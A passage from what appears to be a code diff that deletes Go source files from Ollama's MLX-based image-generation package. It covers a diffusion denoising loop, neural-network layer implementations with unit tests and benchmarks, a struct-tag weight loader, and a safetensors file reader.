}
}
// Scheduler
scheduler := NewFlowMatchEulerScheduler(DefaultFlowMatchSchedulerConfig())
scheduler.SetTimestepsWithMu(cfg.Steps, CalculateShift(hTok*wTok))
// Init latents [B, C, H, W]
var latents *mlx.Array
{
latents = scheduler.InitNoise([]int32{1, tcfg.InChannels, latentH, latentW}, cfg.Seed)
mlx.Eval(latents)
}
// RoPE cache
var ropeCache *RoPECache
{
ropeCache = m.Transformer.PrepareRoPECache(hTok, wTok, posEmb.Shape()[1])
mlx.Keep(ropeCache.ImgCos, ropeCache.ImgSin, ropeCache.CapCos, ropeCache.CapSin,
ropeCache.UnifiedCos, ropeCache.UnifiedSin)
mlx.Eval(ropeCache.UnifiedCos)
}
// Step cache for shallow layer reuse (DeepCache/Learning-to-Cache style)
var stepCache *cache.StepCache
if cfg.LayerCache {
stepCache = cache.NewStepCache(cfg.CacheLayers)
fmt.Printf(" Layer caching enabled: %d layers, refresh every %d steps\n",
cfg.CacheLayers, cfg.CacheInterval)
}
// Denoising loop
for i := 0; i < cfg.Steps; i++ {
stepStart := time.Now()
if cfg.Progress != nil {
cfg.Progress(i+1, cfg.Steps)
}
// GPU capture on step 2 if requested
if cfg.CapturePath != "" && i == 1 {
mlx.MetalStartCapture(cfg.CapturePath)
}
tCurr := scheduler.Timesteps[i]
timestep := mlx.ToBFloat16(mlx.NewArray([]float32{1.0 - tCurr}, []int32{1}))
patches := PatchifyLatents(latents, tcfg.PatchSize)
var output *mlx.Array
if stepCache != nil {
// Use layer caching for faster inference
if useCFG {
posOutput := m.Transformer.ForwardWithCache(patches, timestep, posEmb, ropeCache,
stepCache, i, cfg.CacheInterval)
// Note: CFG with layer cache shares the cache between pos/neg
// This is approximate but fast - neg prompt uses same cached shallow layers
negOutput := m.Transformer.ForwardWithCache(patches, timestep, negEmb, ropeCache,
stepCache, i, cfg.CacheInterval)
diff := mlx.Sub(posOutput, negOutput)
scaledDiff := mlx.MulScalar(diff, cfg.CFGScale)
output = mlx.Add(negOutput, scaledDiff)
} else {
output = m.Transformer.ForwardWithCache(patches, timestep, posEmb, ropeCache,
stepCache, i, cfg.CacheInterval)
}
} else {
// Standard forward without caching
if useCFG {
posOutput := m.Transformer.Forward(patches, timestep, posEmb, ropeCache)
negOutput := m.Transformer.Forward(patches, timestep, negEmb, ropeCache)
diff := mlx.Sub(posOutput, negOutput)
scaledDiff := mlx.MulScalar(diff, cfg.CFGScale)
output = mlx.Add(negOutput, scaledDiff)
} else {
output = m.Transformer.Forward(patches, timestep, posEmb, ropeCache)
}
}
noisePred := UnpatchifyLatents(output, tcfg.PatchSize, latentH, latentW, tcfg.InChannels)
noisePred = mlx.Neg(noisePred)
oldLatents := latents
latents = scheduler.Step(noisePred, latents, i)
// Keep latents and any cached arrays
if stepCache != nil {
mlx.Keep(stepCache.Arrays()...)
}
mlx.Eval(latents)
oldLatents.Free()
if cfg.CapturePath != "" && i == 1 {
mlx.MetalStopCapture()
}
activeMem := float64(mlx.MetalGetActiveMemory()) / (1024 * 1024 * 1024)
peakMem := float64(mlx.MetalGetPeakMemory()) / (1024 * 1024 * 1024)
fmt.Printf(" Step %d/%d: t=%.4f (%.2fs) [%.1f GB active, %.1f GB peak]\n",
i+1, cfg.Steps, tCurr, time.Since(stepStart).Seconds(), activeMem, peakMem)
}
// Free denoising temporaries before VAE decode
posEmb.Free()
if negEmb != nil {
negEmb.Free()
}
ropeCache.ImgCos.Free()
ropeCache.ImgSin.Free()
ropeCache.CapCos.Free()
ropeCache.CapSin.Free()
ropeCache.UnifiedCos.Free()
ropeCache.UnifiedSin.Free()
if stepCache != nil {
stepCache.Free()
}
// VAE decode
decoded := m.VAEDecoder.Decode(latents)
latents.Free()
return decoded, nil
}
// padToLength pads a sequence tensor to the target length by repeating the last token.
func padToLength(x *mlx.Array, targetLen int32) *mlx.Array {
shape := x.Shape()
currentLen := shape[1]
if currentLen >= targetLen {
return x
}
padLen := targetLen - currentLen
lastToken := mlx.Slice(x, []int32{0, currentLen - 1, 0}, []int32{shape[0], currentLen, shape[2]})
padding := mlx.Tile(lastToken, []int32{1, padLen, 1})
return mlx.Concatenate([]*mlx.Array{x, padding}, 1)
}
// CalculateShift computes the mu shift value for dynamic scheduling
func CalculateShift(imgSeqLen int32) float32 {
baseSeqLen := float32(256)
maxSeqLen := float32(4096)
baseShift := float32(0.5)
maxShift := float32(1.15)
m := (maxShift - baseShift) / (maxSeqLen - baseSeqLen)
b := baseShift - m*baseSeqLen
return float32(imgSeqLen)*m + b
}

View File

@@ -1,203 +0,0 @@
//go:build mlx
// Package nn provides neural network layer types.
package nn
import "github.com/ollama/ollama/x/imagegen/mlx"
// Layer is the interface for neural network layers with a Forward method.
type Layer interface {
Forward(x *mlx.Array) *mlx.Array
}
// Linear applies an affine transformation: y = x @ W.T + b
// Weight is stored as [out_features, in_features], matching PyTorch/MLX convention.
type Linear struct {
Weight *mlx.Array `weight:"weight"` // [out_features, in_features]
Bias *mlx.Array `weight:"bias,optional"` // [out_features] or nil
}
// NewLinear creates a linear layer.
// Weight should be [out_features, in_features].
func NewLinear(weight *mlx.Array, bias *mlx.Array) *Linear {
return &Linear{Weight: weight, Bias: bias}
}
// NewQuantizedLinear creates a quantized linear layer directly from bf16 weights.
// Quantizes the weight immediately and evaluates to break lazy dependencies.
func NewQuantizedLinear(weight *mlx.Array, bias *mlx.Array, groupSize, bits int, mode string) *QuantizedLinear {
qw, scales, qbiases := mlx.Quantize(weight, groupSize, bits, mode)
// Eval immediately so bf16 weight can be freed
mlx.Eval(qw, scales, qbiases)
return &QuantizedLinear{
Weight: qw,
Scales: scales,
QBiases: qbiases,
Bias: bias,
GroupSize: groupSize,
Bits: bits,
Mode: mode,
}
}
// Forward applies the linear transformation: x @ W.T + bias
func (l *Linear) Forward(x *mlx.Array) *mlx.Array {
w := mlx.Transpose(l.Weight, 1, 0)
if l.Bias != nil {
return mlx.AddMM(l.Bias, x, w, 1.0, 1.0)
}
return mlx.Linear(x, w)
}
// ToQuantized converts this Linear to a QuantizedLinear.
func (l *Linear) ToQuantized(groupSize, bits int, mode string) *QuantizedLinear {
qw, scales, qbiases := mlx.Quantize(l.Weight, groupSize, bits, mode)
return &QuantizedLinear{
Weight: qw,
Scales: scales,
QBiases: qbiases,
Bias: l.Bias,
GroupSize: groupSize,
Bits: bits,
Mode: mode,
}
}
// QuantizedLinear applies an affine transformation using quantized weights.
// Equivalent to mlx.nn.QuantizedLinear.
type QuantizedLinear struct {
Weight *mlx.Array // Quantized weight data
Scales *mlx.Array // Scale factors for dequantization
QBiases *mlx.Array // Quantization biases (NOT layer bias)
Bias *mlx.Array // Layer bias [output_dims] or nil
GroupSize int
Bits int
Mode string
}
// Forward applies the quantized linear transformation.
func (ql *QuantizedLinear) Forward(x *mlx.Array) *mlx.Array {
out := mlx.QuantizedMatmul(x, ql.Weight, ql.Scales, ql.QBiases, true, ql.GroupSize, ql.Bits, ql.Mode)
if ql.Bias != nil {
out = mlx.Add(out, ql.Bias)
}
return out
}
// RMSNorm represents an RMS normalization layer.
type RMSNorm struct {
Weight *mlx.Array `weight:"weight"`
Eps float32 // optional: used if Forward called with eps=0
}
// NewRMSNorm creates an RMSNorm layer (for models not using weight loader).
func NewRMSNorm(weight *mlx.Array, eps float32) *RMSNorm {
return &RMSNorm{Weight: weight, Eps: eps}
}
// Forward applies RMS normalization. If eps=0, uses stored Eps.
func (rn *RMSNorm) Forward(x *mlx.Array, eps float32) *mlx.Array {
if eps == 0 {
eps = rn.Eps
}
return mlx.RMSNorm(x, rn.Weight, eps)
}
// Embedding represents an embedding layer.
type Embedding struct {
Weight *mlx.Array `weight:"weight"`
}
// NewEmbedding creates an embedding layer.
func NewEmbedding(weight *mlx.Array) *Embedding {
return &Embedding{Weight: weight}
}
// Forward looks up embeddings by indices.
func (e *Embedding) Forward(indices *mlx.Array) *mlx.Array {
return mlx.Take(e.Weight, indices, 0)
}
// RepeatKV repeats K/V tensors for grouped query attention
// x: [B, num_kv_heads, S, head_dim] -> [B, num_heads, S, head_dim]
func RepeatKV(x *mlx.Array, repeatFactor int32) *mlx.Array {
if repeatFactor == 1 {
return x
}
shape := x.Shape()
// [B, num_kv_heads, S, head_dim] -> [B, num_kv_heads, 1, S, head_dim]
x = mlx.ExpandDims(x, 2)
// Repeat along the new axis
reps := []int32{1, 1, repeatFactor, 1, 1}
x = mlx.Tile(x, reps)
// Reshape: [B, num_kv_heads, repeat, S, head_dim] -> [B, num_kv_heads * repeat, S, head_dim]
return mlx.Reshape(x, shape[0], shape[1]*repeatFactor, shape[2], shape[3])
}
// ApplyCausalMask applies causal (lower triangular) mask to attention scores
func ApplyCausalMask(scores *mlx.Array) *mlx.Array {
// scores: [B, num_heads, S, S]
shape := scores.Shape()
seqLen := shape[2]
// Create causal mask: 1 for positions to keep, 0 for positions to mask
mask := mlx.Tri(seqLen, seqLen, 0)
// Where mask is 0, set score to -inf
negInf := mlx.NewScalarArray(float32(-1e9))
// Broadcast mask to match scores shape
mask = mlx.ExpandDims(mlx.ExpandDims(mask, 0), 0) // [1, 1, S, S]
// Use where: if mask > 0, keep scores, else -inf
return mlx.Where(mask, scores, negInf)
}
// ApplyCausalMaskWithOffset applies causal mask for cached attention
// scores: [B, num_heads, queryLen, keyLen] where keyLen = cacheLen + queryLen
// offset: the starting position of the new queries (i.e., cache length)
func ApplyCausalMaskWithOffset(scores *mlx.Array, offset int32) *mlx.Array {
if offset == 0 {
return ApplyCausalMask(scores)
}
shape := scores.Shape()
queryLen := shape[2]
keyLen := shape[3]
// For cached attention, new queries can attend to all cached keys plus
// new keys up to and including their position.
mask := mlx.Tri(queryLen, keyLen, int(offset))
negInf := mlx.NewScalarArray(float32(-1e9))
mask = mlx.ExpandDims(mlx.ExpandDims(mask, 0), 0) // [1, 1, queryLen, keyLen]
return mlx.Where(mask, scores, negInf)
}
// LayerNorm represents a standard layer normalization layer (with bias).
type LayerNorm struct {
Weight *mlx.Array `weight:"weight"`
Bias *mlx.Array `weight:"bias"`
Eps float32
}
// Forward applies layer normalization: (x - mean) / sqrt(var + eps) * weight + bias
func (ln *LayerNorm) Forward(x *mlx.Array) *mlx.Array {
eps := ln.Eps
if eps == 0 {
eps = 1e-5
}
// Compute mean and variance along last dimension
mean := mlx.Mean(x, -1, true)
centered := mlx.Sub(x, mean)
variance := mlx.Mean(mlx.Mul(centered, centered), -1, true)
normalized := mlx.Mul(centered, mlx.RSqrt(mlx.AddScalar(variance, eps)))
// Scale and shift
out := mlx.Mul(normalized, ln.Weight)
if ln.Bias != nil {
out = mlx.Add(out, ln.Bias)
}
return out
}

View File

@@ -1,356 +0,0 @@
//go:build mlx
package nn
import (
"math"
"testing"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// TestLinearNoBias verifies Linear without bias computes x @ w.T correctly.
func TestLinearNoBias(t *testing.T) {
// Weight: [out=2, in=3] -> transposed at forward time
weight := mlx.NewArrayFloat32([]float32{
1, 2, 3, // row 0
4, 5, 6, // row 1
}, []int32{2, 3})
mlx.Eval(weight)
linear := NewLinear(weight, nil)
// Input: [1, 3]
x := mlx.NewArrayFloat32([]float32{1, 1, 1}, []int32{1, 3})
mlx.Eval(x)
out := linear.Forward(x)
mlx.Eval(out)
// Expected: [1,1,1] @ [[1,4],[2,5],[3,6]] = [6, 15]
data := out.Data()
if len(data) != 2 || data[0] != 6 || data[1] != 15 {
t.Errorf("expected [6, 15], got %v", data)
}
}
// TestLinearWithBias verifies Linear with bias computes x @ w.T + b correctly.
func TestLinearWithBias(t *testing.T) {
weight := mlx.NewArrayFloat32([]float32{
1, 2, 3,
4, 5, 6,
}, []int32{2, 3})
bias := mlx.NewArrayFloat32([]float32{10, 20}, []int32{2})
mlx.Eval(weight, bias)
linear := NewLinear(weight, bias)
x := mlx.NewArrayFloat32([]float32{1, 1, 1}, []int32{1, 3})
mlx.Eval(x)
out := linear.Forward(x)
mlx.Eval(out)
// Expected: [6, 15] + [10, 20] = [16, 35]
data := out.Data()
if len(data) != 2 || data[0] != 16 || data[1] != 35 {
t.Errorf("expected [16, 35], got %v", data)
}
}
// TestLinearBatched verifies Linear works with batched input.
func TestLinearBatched(t *testing.T) {
weight := mlx.NewArrayFloat32([]float32{
1, 0,
0, 1,
}, []int32{2, 2}) // Identity
mlx.Eval(weight)
linear := NewLinear(weight, nil)
// Batch of 3 inputs
x := mlx.NewArrayFloat32([]float32{
1, 2,
3, 4,
5, 6,
}, []int32{3, 2})
mlx.Eval(x)
out := linear.Forward(x)
mlx.Eval(out)
// Identity should return same values
data := out.Data()
expected := []float32{1, 2, 3, 4, 5, 6}
for i, v := range expected {
if data[i] != v {
t.Errorf("at %d: expected %f, got %f", i, v, data[i])
}
}
}
// TestRMSNorm verifies RMSNorm computation.
func TestRMSNorm(t *testing.T) {
weight := mlx.NewArrayFloat32([]float32{1, 1, 1, 1}, []int32{4})
mlx.Eval(weight)
norm := NewRMSNorm(weight, 1e-5)
// Input with known RMS
x := mlx.NewArrayFloat32([]float32{2, 2, 2, 2}, []int32{1, 4})
mlx.Eval(x)
out := norm.Forward(x, 0) // eps=0 uses stored Eps
mlx.Eval(out)
// RMS of [2,2,2,2] = 2, so normalized = [1,1,1,1]
data := out.Data()
for i, v := range data {
if math.Abs(float64(v-1.0)) > 1e-4 {
t.Errorf("at %d: expected ~1.0, got %f", i, v)
}
}
}
// TestRMSNormWithScale verifies RMSNorm applies weight scaling.
func TestRMSNormWithScale(t *testing.T) {
weight := mlx.NewArrayFloat32([]float32{2, 2, 2, 2}, []int32{4})
mlx.Eval(weight)
norm := NewRMSNorm(weight, 1e-5)
x := mlx.NewArrayFloat32([]float32{2, 2, 2, 2}, []int32{1, 4})
mlx.Eval(x)
out := norm.Forward(x, 0) // eps=0 uses stored Eps
mlx.Eval(out)
// Normalized [1,1,1,1] * weight [2,2,2,2] = [2,2,2,2]
data := out.Data()
for i, v := range data {
if math.Abs(float64(v-2.0)) > 1e-4 {
t.Errorf("at %d: expected ~2.0, got %f", i, v)
}
}
}
// TestEmbedding verifies embedding lookup.
func TestEmbedding(t *testing.T) {
// Embedding table: 4 tokens, dim 3
weight := mlx.NewArrayFloat32([]float32{
0, 0, 0, // token 0
1, 1, 1, // token 1
2, 2, 2, // token 2
3, 3, 3, // token 3
}, []int32{4, 3})
mlx.Eval(weight)
emb := NewEmbedding(weight)
// Look up tokens [1, 3, 0]
indices := mlx.NewArrayInt32([]int32{1, 3, 0}, []int32{3})
mlx.Eval(indices)
out := emb.Forward(indices)
mlx.Eval(out)
data := out.Data()
expected := []float32{1, 1, 1, 3, 3, 3, 0, 0, 0}
for i, v := range expected {
if data[i] != v {
t.Errorf("at %d: expected %f, got %f", i, v, data[i])
}
}
}
// TestRepeatKV verifies K/V repetition for GQA.
func TestRepeatKV(t *testing.T) {
// [B=1, num_kv_heads=2, S=2, head_dim=2]
x := mlx.NewArrayFloat32([]float32{
// head 0
1, 2, // pos 0
3, 4, // pos 1
// head 1
5, 6, // pos 0
7, 8, // pos 1
}, []int32{1, 2, 2, 2})
mlx.Eval(x)
// Repeat factor 2: 2 kv heads -> 4 heads
out := RepeatKV(x, 2)
mlx.Eval(out)
shape := out.Shape()
if shape[0] != 1 || shape[1] != 4 || shape[2] != 2 || shape[3] != 2 {
t.Errorf("expected shape [1,4,2,2], got %v", shape)
}
data := out.Data()
// After repeat: head0, head0, head1, head1
expected := []float32{
1, 2, 3, 4, // head 0 (original)
1, 2, 3, 4, // head 0 (repeat)
5, 6, 7, 8, // head 1 (original)
5, 6, 7, 8, // head 1 (repeat)
}
for i, v := range expected {
if data[i] != v {
t.Errorf("at %d: expected %f, got %f", i, v, data[i])
}
}
}
// TestRepeatKVNoOp verifies RepeatKV with factor 1 returns input unchanged.
func TestRepeatKVNoOp(t *testing.T) {
x := mlx.NewArrayFloat32([]float32{1, 2, 3, 4}, []int32{1, 1, 2, 2})
mlx.Eval(x)
out := RepeatKV(x, 1)
// Should return same pointer
if out != x {
t.Error("RepeatKV with factor 1 should return input unchanged")
}
}
// TestApplyCausalMask verifies causal masking.
func TestApplyCausalMask(t *testing.T) {
// [B=1, heads=1, S=3, S=3] - all ones
scores := mlx.Ones(1, 1, 3, 3)
mlx.Eval(scores)
out := ApplyCausalMask(scores)
mlx.Eval(out)
data := out.Data()
// Lower triangular should be 1, upper should be -1e9
// Row 0: [1, -inf, -inf]
// Row 1: [1, 1, -inf]
// Row 2: [1, 1, 1]
if data[0] != 1 || data[1] >= 0 || data[2] >= 0 {
t.Errorf("row 0 wrong: %v", data[0:3])
}
if data[3] != 1 || data[4] != 1 || data[5] >= 0 {
t.Errorf("row 1 wrong: %v", data[3:6])
}
if data[6] != 1 || data[7] != 1 || data[8] != 1 {
t.Errorf("row 2 wrong: %v", data[6:9])
}
}
// TestApplyCausalMaskWithOffset verifies causal masking with cache offset.
func TestApplyCausalMaskWithOffset(t *testing.T) {
// Simulating: cache has 2 tokens, adding 1 new query
// scores: [B=1, heads=1, queryLen=1, keyLen=3]
scores := mlx.Ones(1, 1, 1, 3)
mlx.Eval(scores)
out := ApplyCausalMaskWithOffset(scores, 2)
mlx.Eval(out)
data := out.Data()
// With offset=2, query at position 2 can attend to all 3 positions
if data[0] != 1 || data[1] != 1 || data[2] != 1 {
t.Errorf("expected [1, 1, 1], got %v", data)
}
}
// TestApplyCausalMaskWithOffsetZero verifies offset=0 falls back to regular causal.
func TestApplyCausalMaskWithOffsetZero(t *testing.T) {
scores := mlx.Ones(1, 1, 2, 2)
mlx.Eval(scores)
out := ApplyCausalMaskWithOffset(scores, 0)
mlx.Eval(out)
data := out.Data()
// Standard causal: [1, -inf], [1, 1]
if data[0] != 1 || data[1] >= 0 {
t.Errorf("row 0 wrong: %v", data[0:2])
}
if data[2] != 1 || data[3] != 1 {
t.Errorf("row 1 wrong: %v", data[2:4])
}
}
// BenchmarkLinearSmall benchmarks small Linear forward pass.
func BenchmarkLinearSmall(b *testing.B) {
weight := mlx.RandomNormal([]int32{256, 256}, 42)
mlx.Eval(weight)
linear := NewLinear(weight, nil)
x := mlx.RandomNormal([]int32{1, 256}, 43)
mlx.Eval(x)
b.ResetTimer()
for i := 0; i < b.N; i++ {
out := linear.Forward(x)
mlx.Eval(out)
}
}
// BenchmarkLinearLarge benchmarks larger Linear forward pass.
func BenchmarkLinearLarge(b *testing.B) {
weight := mlx.RandomNormal([]int32{4096, 4096}, 42)
mlx.Eval(weight)
linear := NewLinear(weight, nil)
x := mlx.RandomNormal([]int32{1, 4096}, 43)
mlx.Eval(x)
b.ResetTimer()
for i := 0; i < b.N; i++ {
out := linear.Forward(x)
mlx.Eval(out)
}
}
// BenchmarkRMSNorm benchmarks RMSNorm forward pass.
func BenchmarkRMSNorm(b *testing.B) {
weight := mlx.Ones(4096)
mlx.Eval(weight)
norm := NewRMSNorm(weight, 1e-5)
x := mlx.RandomNormal([]int32{1, 4096}, 42)
mlx.Eval(x)
b.ResetTimer()
for i := 0; i < b.N; i++ {
out := norm.Forward(x, 0)
mlx.Eval(out)
}
}
// BenchmarkEmbedding benchmarks embedding lookup.
func BenchmarkEmbedding(b *testing.B) {
// Typical vocab size
weight := mlx.RandomNormal([]int32{32000, 4096}, 42)
mlx.Eval(weight)
emb := NewEmbedding(weight)
// Single token lookup
indices := mlx.NewArrayInt32([]int32{1000}, []int32{1})
mlx.Eval(indices)
b.ResetTimer()
for i := 0; i < b.N; i++ {
out := emb.Forward(indices)
mlx.Eval(out)
}
}
// BenchmarkRepeatKV benchmarks K/V repetition.
func BenchmarkRepeatKV(b *testing.B) {
// Typical GQA setup: 8 kv heads -> 32 heads
x := mlx.RandomNormal([]int32{1, 8, 512, 128}, 42)
mlx.Eval(x)
b.ResetTimer()
for i := 0; i < b.N; i++ {
out := RepeatKV(x, 4)
mlx.Eval(out)
}
}

View File

@@ -1,170 +0,0 @@
//go:build mlx
package safetensors
import (
"fmt"
"reflect"
"strings"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// LoadModule loads weights into a struct using reflection and struct tags.
//
// Struct tags use the format: `weight:"path[,optional]"`
// - path: the weight name suffix (appended to prefix)
// - optional: if present, missing weights don't cause errors
// - "-": skip this field entirely
// - no tag on struct pointer: recurse with current prefix
// - no tag on *mlx.Array: skip (computed fields don't need loading)
//
// For slices of struct pointers, the loader iterates with .0, .1, .2... suffixes.
// The slice must be pre-allocated to the correct length.
//
// Example:
//
// type Attention struct {
// QProj *nn.Linear `weight:"self_attn.q_proj"`
// KProj *nn.Linear `weight:"self_attn.k_proj"`
// Cache *mlx.Array // no tag = skipped (computed field)
// }
//
// err := LoadModule(&attn, weights, "model.layers.0")
func LoadModule(dst any, weights *ModelWeights, prefix string) error {
v := reflect.ValueOf(dst)
if v.Kind() != reflect.Ptr || v.IsNil() {
return fmt.Errorf("LoadModule: dst must be a non-nil pointer")
}
v = v.Elem()
if v.Kind() != reflect.Struct {
return fmt.Errorf("LoadModule: dst must be a pointer to struct, got %v", v.Kind())
}
var errs []string
loadStruct(v, weights, prefix, &errs, false)
if len(errs) > 0 {
return fmt.Errorf("LoadModule: missing weights:\n %s", strings.Join(errs, "\n "))
}
return nil
}
// loadStruct recursively loads weights into a struct value.
func loadStruct(v reflect.Value, weights *ModelWeights, prefix string, errs *[]string, parentOptional bool) {
t := v.Type()
for i := 0; i < t.NumField(); i++ {
field := t.Field(i)
fieldVal := v.Field(i)
// Skip unexported fields
if !fieldVal.CanSet() {
continue
}
// Parse tag
tag, hasTag := field.Tag.Lookup("weight")
if tag == "-" {
continue
}
// Parse tag options
optional := parentOptional
weightPath := tag
if idx := strings.Index(tag, ","); idx != -1 {
weightPath = tag[:idx]
if strings.Contains(tag[idx+1:], "optional") {
optional = true
}
}
// Build full path
fullPath := joinPath(prefix, weightPath)
// For struct pointers without a tag, recurse with current prefix
if !hasTag && fieldVal.Kind() == reflect.Ptr {
elemType := fieldVal.Type().Elem()
if elemType.Kind() == reflect.Struct && elemType != reflect.TypeOf(mlx.Array{}) {
if fieldVal.IsNil() {
fieldVal.Set(reflect.New(elemType))
}
loadStruct(fieldVal.Elem(), weights, prefix, errs, optional)
continue
}
}
// Handle by kind
switch fieldVal.Kind() {
case reflect.Ptr:
elemType := fieldVal.Type().Elem()
// *mlx.Array - load directly (but skip if no tag - computed fields)
if fieldVal.Type() == reflect.TypeOf((*mlx.Array)(nil)) {
if !hasTag {
continue // no tag on *mlx.Array = computed field, skip
}
arr, err := weights.GetTensor(fullPath)
if err != nil {
if !optional {
*errs = append(*errs, fullPath)
}
continue
}
fieldVal.Set(reflect.ValueOf(arr))
continue
}
// Pointer to struct - allocate and recurse
if elemType.Kind() == reflect.Struct {
if optional && !hasWeightsWithPrefix(weights, fullPath) {
continue
}
if fieldVal.IsNil() {
fieldVal.Set(reflect.New(elemType))
}
loadStruct(fieldVal.Elem(), weights, fullPath, errs, optional)
}
case reflect.Slice:
elemType := fieldVal.Type().Elem()
if elemType.Kind() == reflect.Ptr && elemType.Elem().Kind() == reflect.Struct {
loadSlice(fieldVal, weights, fullPath, errs)
}
}
}
}
// hasWeightsWithPrefix checks if any weights exist with the given prefix.
func hasWeightsWithPrefix(weights *ModelWeights, prefix string) bool {
for _, name := range weights.ListTensors() {
if strings.HasPrefix(name, prefix+".") || name == prefix {
return true
}
}
return false
}
// loadSlice loads weights into each element of a slice of struct pointers.
func loadSlice(v reflect.Value, weights *ModelWeights, prefix string, errs *[]string) {
elemStructType := v.Type().Elem().Elem()
for i := 0; i < v.Len(); i++ {
elem := v.Index(i)
if elem.IsNil() {
elem.Set(reflect.New(elemStructType))
}
loadStruct(elem.Elem(), weights, fmt.Sprintf("%s.%d", prefix, i), errs, false)
}
}
// joinPath joins path segments with dots, handling empty segments.
func joinPath(prefix, suffix string) string {
if prefix == "" {
return suffix
}
if suffix == "" {
return prefix
}
return prefix + "." + suffix
}

View File

@@ -1,280 +0,0 @@
//go:build mlx
package safetensors
import (
"encoding/binary"
"encoding/json"
"fmt"
"os"
"path/filepath"
"sort"
"strings"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// SafetensorHeader represents the JSON header of a safetensors file
type SafetensorHeader map[string]TensorInfo
// TensorInfo contains metadata about a tensor
type TensorInfo struct {
Dtype string `json:"dtype"`
Shape []int32 `json:"shape"`
DataOffsets [2]int `json:"data_offsets"`
}
// parseSafetensorHeader reads only the JSON header from a safetensors file.
func parseSafetensorHeader(path string) (SafetensorHeader, error) {
f, err := os.Open(path)
if err != nil {
return nil, fmt.Errorf("failed to open file: %w", err)
}
defer f.Close()
var headerSize uint64
if err := binary.Read(f, binary.LittleEndian, &headerSize); err != nil {
return nil, fmt.Errorf("failed to read header size: %w", err)
}
headerBytes := make([]byte, headerSize)
if _, err := f.Read(headerBytes); err != nil {
return nil, fmt.Errorf("failed to read header: %w", err)
}
var header SafetensorHeader
if err := json.Unmarshal(headerBytes, &header); err != nil {
return nil, fmt.Errorf("failed to parse header: %w", err)
}
delete(header, "__metadata__")
return header, nil
}
// dtypeFromString converts safetensors dtype string to mlx.Dtype
func dtypeFromString(s string) mlx.Dtype {
switch strings.ToUpper(s) {
case "F32", "FLOAT32":
return mlx.DtypeFloat32
case "F16", "FLOAT16":
return mlx.DtypeFloat16
case "BF16", "BFLOAT16":
return mlx.DtypeBFloat16
case "I32", "INT32":
return mlx.DtypeInt32
case "I64", "INT64":
return mlx.DtypeInt64
case "U8", "UINT8":
return mlx.DtypeUint8
default:
return mlx.DtypeFloat32
}
}
// ModelWeights manages weights from multiple safetensor files.
type ModelWeights struct {
dir string // Model directory
tensorFiles map[string]string // tensor name -> file path
tensorInfo map[string]TensorInfo // tensor name -> metadata
nativeCache map[string]*mlx.SafetensorsFile // file path -> loaded native handle
cache map[string]*mlx.Array // tensor name -> array (after Load)
}
// LoadModelWeights scans safetensor files and builds a tensor index.
// This only reads JSON headers, not tensor data.
func LoadModelWeights(dir string) (*ModelWeights, error) {
mw := &ModelWeights{
dir: dir,
tensorFiles: make(map[string]string),
tensorInfo: make(map[string]TensorInfo),
nativeCache: make(map[string]*mlx.SafetensorsFile),
}
entries, err := os.ReadDir(dir)
if err != nil {
return nil, fmt.Errorf("failed to read directory: %w", err)
}
for _, entry := range entries {
if strings.HasSuffix(entry.Name(), ".safetensors") {
path := filepath.Join(dir, entry.Name())
header, err := parseSafetensorHeader(path)
if err != nil {
return nil, fmt.Errorf("failed to parse %s: %w", entry.Name(), err)
}
for name, info := range header {
mw.tensorFiles[name] = path
mw.tensorInfo[name] = info
}
}
}
if len(mw.tensorFiles) == 0 {
return nil, fmt.Errorf("no safetensor files found in %s", dir)
}
return mw, nil
}
// Load loads all tensors into cache with the specified dtype.
// If dtype is 0, tensors are loaded in their original dtype.
// Automatically uses streaming (memory-efficient) when dtype conversion is needed,
// or native loading when tensors are already in the target dtype.
func (mw *ModelWeights) Load(dtype mlx.Dtype) error {
if dtype == 0 {
return mw.loadNative()
}
// Check if any tensor needs conversion
needsConversion := false
for name := range mw.tensorFiles {
info := mw.tensorInfo[name]
if dtypeFromString(info.Dtype) != dtype {
needsConversion = true
break
}
}
if needsConversion {
return mw.loadStreaming(dtype)
}
return mw.loadNative()
}
// loadNative loads all tensors using the native memory-mapped loader.
func (mw *ModelWeights) loadNative() error {
mw.cache = make(map[string]*mlx.Array)
fileToTensors := make(map[string][]string)
for name, path := range mw.tensorFiles {
fileToTensors[path] = append(fileToTensors[path], name)
}
for path, names := range fileToTensors {
native, err := mlx.LoadSafetensorsNative(path)
if err != nil {
return fmt.Errorf("failed to load %s: %w", path, err)
}
for _, name := range names {
arr := native.Get(name)
if arr == nil {
native.Free()
return fmt.Errorf("tensor %q not found in %s", name, path)
}
mw.cache[name] = arr
}
mw.nativeCache[path] = native
}
return nil
}
// loadStreaming loads tensors with dtype conversion.
// Uses the same pattern as Python: replace each entry in the map after conversion,
// so the original tensor loses its reference and can be freed.
func (mw *ModelWeights) loadStreaming(dtype mlx.Dtype) error {
mw.cache = make(map[string]*mlx.Array)
fileToTensors := make(map[string][]string)
for name, path := range mw.tensorFiles {
fileToTensors[path] = append(fileToTensors[path], name)
}
for path, names := range fileToTensors {
native, err := mlx.LoadSafetensorsNative(path)
if err != nil {
return fmt.Errorf("failed to load %s: %w", path, err)
}
for _, name := range names {
src := native.Get(name)
if src == nil {
native.Free()
return fmt.Errorf("tensor %q not found in %s", name, path)
}
dst := mlx.AsType(src, dtype)
mlx.Eval(dst)
native.Set(name, dst)
mw.cache[name] = dst
}
native.Free()
}
return nil
}
// Get returns a tensor from cache. Call Load() first.
func (mw *ModelWeights) Get(name string) (*mlx.Array, error) {
if mw.cache == nil {
return nil, fmt.Errorf("cache not initialized: call Load() first")
}
arr, ok := mw.cache[name]
if !ok {
return nil, fmt.Errorf("tensor %q not found in cache", name)
}
return arr, nil
}
// GetTensor loads a tensor using the native loader without caching.
// For bulk loading, use Load() + Get() instead.
func (mw *ModelWeights) GetTensor(name string) (*mlx.Array, error) {
if mw.cache != nil {
if arr, ok := mw.cache[name]; ok {
return arr, nil
}
}
path, ok := mw.tensorFiles[name]
if !ok {
return nil, fmt.Errorf("tensor %q not found", name)
}
native, ok := mw.nativeCache[path]
if !ok {
var err error
native, err = mlx.LoadSafetensorsNative(path)
if err != nil {
return nil, fmt.Errorf("failed to load %s: %w", path, err)
}
mw.nativeCache[path] = native
}
return native.Get(name), nil
}
// GetTensorInfo returns metadata about a tensor without loading it.
func (mw *ModelWeights) GetTensorInfo(name string) (TensorInfo, bool) {
info, ok := mw.tensorInfo[name]
return info, ok
}
// ListTensors returns all tensor names.
func (mw *ModelWeights) ListTensors() []string {
names := make([]string, 0, len(mw.tensorFiles))
for name := range mw.tensorFiles {
